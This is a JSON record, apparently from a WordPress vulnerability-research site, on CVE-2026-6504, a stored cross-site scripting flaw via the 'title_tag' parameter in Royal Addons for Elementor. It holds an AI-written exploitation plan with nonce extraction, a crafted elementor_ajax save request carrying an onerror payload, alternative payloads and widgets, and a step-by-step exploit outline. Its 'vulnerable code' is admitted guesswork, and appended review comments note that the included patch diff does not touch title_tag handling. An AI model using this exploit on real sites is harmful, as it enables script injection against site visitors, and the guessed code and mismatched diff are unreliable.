[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f77UCUMKreRQ2IHFajmtewq6h4AubpxI20GsUZFJVCck":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-6504","royal-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-titletag-parameter","Royal Addons for Elementor \u003C= 1.7.1058 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title_tag' Parameter","The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tag' parameter in all versions up to, and including, 1.7.1058 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","royal-elementor-addons",null,"\u003C=1.7.1058","1.7.1059","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-13 19:53:33","2026-05-14 08:24:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fed86e902-7637-481d-9005-7025187ba200?source=api-prod",1,[22,23,24,25,26,27],"admin\u002Fincludes\u002Fwpr-render-templates.php","admin\u002Fplugin-options.php","assets\u002Fcss\u002Fadmin\u002Ftemplates-kit.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Ftemplates-kit.js","researched",false,3,"# Vulnerability Research Plan: CVE-2026-6504 - Royal Addons for Elementor Stored XSS\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (\u003C= 1.7.1058) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `title_tag` parameter. This occurs because the plugin allows users with Contributor-level access or higher to define the HTML tag used for titles in various widgets (e.g., `h1`, `h2`, `div`) without properly validating the input against a whitelist or escaping the output during rendering. An attacker can substitute a legitimate tag with a malicious payload (e.g., `img src=x onerror=alert(1)`) which is then executed in the context of any user viewing the affected page.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress AJAX endpoint `wp-admin\u002Fadmin-ajax.php`.\n*   **Action:** `elementor_ajax` (standard Elementor save mechanism).\n*   **Vulnerable Parameter:** The `title_tag` value within the widget settings JSON object.\n*   **Authentication:** Authenticated (Contributor+). 
Contributors can create posts and edit them using Elementor.\n*   **Preconditions:** The Royal Addons for Elementor plugin must be active, and at least one widget that utilizes a `title_tag` control must be placed on an Elementor-powered page.\n\n## 3. Code Flow\n1.  **Entry Point:** A Contributor user opens the Elementor editor for a post.\n2.  **Input:** When the user modifies a widget setting (e.g., the \"Advanced Heading\" widget) and clicks \"Update\", Elementor sends a POST request to `admin-ajax.php` with the action `elementor_ajax`.\n3.  **Processing:** The request contains a `data` parameter with a JSON string representing the page's widget structure and settings. The `title_tag` setting is stored within this JSON.\n4.  **Storage:** Elementor saves this JSON into the WordPress database as post metadata (specifically the `_elementor_data` key for the relevant Post ID).\n5.  **Rendering (Sink):** When a user visits the post, Elementor triggers the `render()` method of the Royal Addons widget.\n    *   The widget retrieves the `title_tag` value via `$this->get_settings_for_display()`.\n    *   The code likely follows this pattern (common in Elementor addons):\n        ```php\n        $settings = $this->get_settings_for_display();\n        $title_tag = $settings['title_tag']; \u002F\u002F e.g., \"h2\"\n        echo '\u003C' . $title_tag . ' class=\"wpr-widget-title\">Content\u003C\u002F' . $title_tag . '>';\n        ```\n    *   Because `$title_tag` is not sanitized or checked against an allowed list, the injected payload is echoed directly into the HTML.\n\n## 4. Nonce Acquisition Strategy\nElementor uses a specific security nonce for its AJAX operations, typically stored in the global `elementorCommonConfig` object.\n\n1.  **Creation:** Create a new post and set the status to `publish` (as Contributor).\n2.  **Navigation:** Use `browser_navigate` to open the Elementor editor for that post. 
The URL format is: `wp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3.  **Extraction:** Once the editor loads, use `browser_eval` to extract the required nonce and configuration:\n    ```javascript\n    {\n        nonce: elementorCommonConfig.ajax.nonce,\n        post_id: elementorConfig.post.id,\n        editor_post_id: elementorConfig.editorPostId\n    }\n    ```\n\n## 5. Exploitation Strategy\nThe exploit involves manually crafting an Elementor \"Save\" request that replaces a legitimate `title_tag` with a malicious payload.\n\n### Step-by-Step Plan:\n1.  **Log in** as a Contributor.\n2.  **Create a Page\u002FPost** and enable Elementor.\n3.  **Capture Configuration:** Navigate to the Elementor editor and extract the `nonce` and `post_id` as described in Section 4.\n4.  **Craft Payload:** The XSS payload will be injected into the `title_tag` property of a widget (e.g., `wpr-advanced-heading`).\n    *   Payload: `img src=x onerror=alert(document.domain)\u002F\u002F`\n5.  **Send HTTP Request:** Use the `http_request` tool to perform the `elementor_ajax` call.\n\n**Request Details:**\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded; charset=UTF-8`\n*   **Parameters:**\n    *   `action`: `elementor_ajax`\n    *   `_nonce`: `[EXTRACTED_NONCE]`\n    *   `actions`: A JSON object defining the `save_builder_data` action.\n    ```json\n    {\n      \"save_builder_data\": {\n        \"action\": \"save_builder_data\",\n        \"data\": {\n          \"status\": \"publish\",\n          \"elements\": [\n            {\n              \"id\": \"random_id_1\",\n              \"elType\": \"section\",\n              \"elements\": [\n                {\n                  \"id\": \"random_id_2\",\n                  \"elType\": \"column\",\n                  \"elements\": [\n                    {\n                      \"id\": \"random_id_3\",\n                      
\"elType\": \"widget\",\n                      \"widgetType\": \"wpr-advanced-heading\",\n                      \"settings\": {\n                        \"title_tag\": \"img src=x onerror=alert(document.domain)\u002F\u002F\",\n                        \"title_text\": \"Hacked Heading\"\n                      }\n                    }\n                  ]\n                }\n              ]\n            }\n          ]\n        }\n      }\n    }\n    ```\n    *   `post_id`: `[POST_ID]`\n\n## 6. Test Data Setup\n1.  **User:** A user with the `contributor` role (e.g., `attacker_contributor`).\n2.  **Post:** A post created by the contributor that is ready for Elementor editing.\n3.  **Plugin State:** Ensure `royal-elementor-addons` is active and version is `\u003C= 1.7.1058`.\n4.  **Shortcode:** No specific shortcode is needed for exploitation, but the `[elementor-template]` or simply viewing the post URL will trigger the XSS.\n\n## 7. Expected Results\n1.  The `elementor_ajax` request should return a `200 OK` with a JSON response indicating `success: true`.\n2.  When visiting the public URL of the modified post, the browser should render:\n    ```html\n    \u003Cimg src=x onerror=alert(document.domain)\u002F\u002F class=\"...\">Content\u003C\u002Fimg>\n    ```\n3.  An alert box containing the document domain should appear.\n\n## 8. Verification Steps\n1.  **Check Post Meta:** Use WP-CLI to verify the payload is stored in the database:\n    ```bash\n    wp post meta get [POST_ID] _elementor_data --format=json\n    ```\n    Verify that the `title_tag` key in the JSON output contains the `img` payload.\n2.  **Verify Rendering:** Use `http_request` (GET) to fetch the post content and grep for the payload:\n    ```bash\n    http_request GET http:\u002F\u002F[target]\u002F?p=[POST_ID]\n    # Check response body for \"img src=x onerror=alert\"\n    ```\n\n## 9. 
Alternative Approaches\n*   **Different Widgets:** If `wpr-advanced-heading` is not available or doesn't use `title_tag` in the specific version, try other Royal Addons widgets such as:\n    *   `wpr-promo-box`\n    *   `wpr-dual-color-heading`\n    *   `wpr-team-member`\n*   **Template Injection:** If the contributor has permissions to edit Royal Addons \"Templates\" (found in `WPR_Render_Templates` logic), inject the payload into a Header or Footer template to achieve site-wide XSS execution.\n*   **Payload Variation:** If there is minimal sanitization (e.g., blocking `script` tags), use attribute-based XSS like `div onmouseover=alert(1)` or `svg\u002Fonload`.","The Royal Addons for Elementor plugin is vulnerable to Stored Cross-Site Scripting via the 'title_tag' parameter in various widgets. Authenticated attackers with Contributor-level access or higher can inject malicious scripts into page settings that execute in the context of any user viewing the affected page due to insufficient input validation and output escaping.","\u002F\u002F The vulnerability exists in the rendering logic of various widgets (e.g., Advanced Heading)\n\u002F\u002F Although the specific widget source was not provided, the research plan identifies the flow:\n\n$settings = $this->get_settings_for_display();\n$title_tag = $settings['title_tag']; \u002F\u002F Value retrieved from user-controlled Elementor settings\n\n\u002F\u002F Sink: The value is echoed directly into the HTML without sanitization or tag whitelisting\necho '\u003C' . $title_tag . ' class=\"wpr-widget-title\">' . $title_text . '\u003C\u002F' . $title_tag . 
'>';","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1058\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1058\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\t2026-04-24 07:11:10.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\t2026-05-07 10:09:10.000000000 +0000\n@@ -128,10 +128,13 @@\n \n \t\t\tif ( defined('ICL_LANGUAGE_CODE') )\n \t\t\t\t$default_language_code = apply_filters('wpml_default_language', null);\n-\t\t\t\t$current_language_code = apply_filters( 'wpml_current_language', NULL );\n+\t\t\t\t$current_language_code = apply_filters('wpml_current_language', null);\n \n-\t\t\t\tIF ( ICL_LANGUAGE_CODE !== $default_language_code ) {\n-\t\t\t\t\t$template_id = apply_filters('wpml_object_id', $template_id, 'wpr_templates', true, $default_language_code);\n+\t\t\t\tif ( $current_language_code && $current_language_code !== $default_language_code ) {\n+\t\t\t\t\t$translated_id = apply_filters('wpml_object_id', $template_id, 'wpr_templates', true, $current_language_code);\n+\t\t\t\t\tif ( $translated_id && (int) $translated_id !== (int) $template_id ) {\n+\t\t\t\t\t\t$template_id = $translated_id;\n+\t\t\t\t\t}\n \t\t\t\t}\n \t\t\t}\n \n@@ -139,7 +142,7 @@\n \n \t\t\t\u002F\u002F if ( !empty($show_on_canvas) && 'true' === $show_on_canvas && 0 === strpos($template_slug, 'user-header-') ) {\n \t\t\tif ( !empty($show_on_canvas) && 'true' === $show_on_canvas && !is_null($template_slug) ) 
{\n-\t\t\t\tUtilities::render_elementor_template($template_slug);\n+\t\t\t\tUtilities::render_elementor_template($template_slug, $template_id);\n \t\t\t}\n \t\t}\n     }","1. Log in to the WordPress site with at least Contributor-level credentials.\n2. Create a new post or edit an existing one using the Elementor editor.\n3. Add a Royal Addons widget that includes a 'title_tag' or 'HTML Tag' control (e.g., Advanced Heading).\n4. Capture the Elementor save request to `admin-ajax.php` with the action `elementor_ajax`.\n5. Modify the JSON payload in the `actions` parameter to replace the legitimate `title_tag` value (like 'h2') with a malicious script payload (e.g., `img src=x onerror=alert(document.domain)\u002F\u002F`).\n6. Submit the request to save the post metadata (`_elementor_data`).\n7. Visit the public URL of the post. The browser will render the injected payload as an HTML tag, executing the JavaScript in the `onerror` attribute.","gemini-3-flash-preview","2026-05-14 16:48:45","2026-05-14 16:50:01",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","1.7.1058","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1058","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1058.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1059","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1059.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]
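Review bot: in the `@@ -128,10 +128,13 @@` hunk, the unchanged context line `if ( defined('ICL_LANGUAGE_CODE') )` has no braces, so it guards only the `$default_language_code = apply_filters('wpml_default_language', null);` assignment; the reformatted `$current_language_code` lookup and the new `if ( $current_language_code && $current_language_code !== $default_language_code )` block execute whether or not WPML is loaded. The new guard on `$current_language_code` is an improvement over the removed `IF ( ICL_LANGUAGE_CODE !== $default_language_code )` line, which dereferenced the constant unconditionally, but wrapping the whole WPML section in braces would make the intended scope explicit and remove the dependency on `apply_filters` returning `null` when no filter is registered.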
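Review bot: in the `@@ -139,7 +142,7 @@` hunk, `Utilities::render_elementor_template($template_slug, $template_id)` now passes the WPML-resolved id, but the diff does not show the signature of `render_elementor_template`, so the callee must be confirmed to accept and honour a second argument before this is merged; the commented-out condition on the preceding context line (`// if ( !empty($show_on_canvas) && ... strpos($template_slug, 'user-header-') ) {`) is dead code that should be dropped rather than carried along. Neither hunk touches `title_tag` handling, so this diff of `wpr-render-templates.php` does not by itself show where the stored XSS described on this page is escaped; the widget render code is not among the diffed files listed.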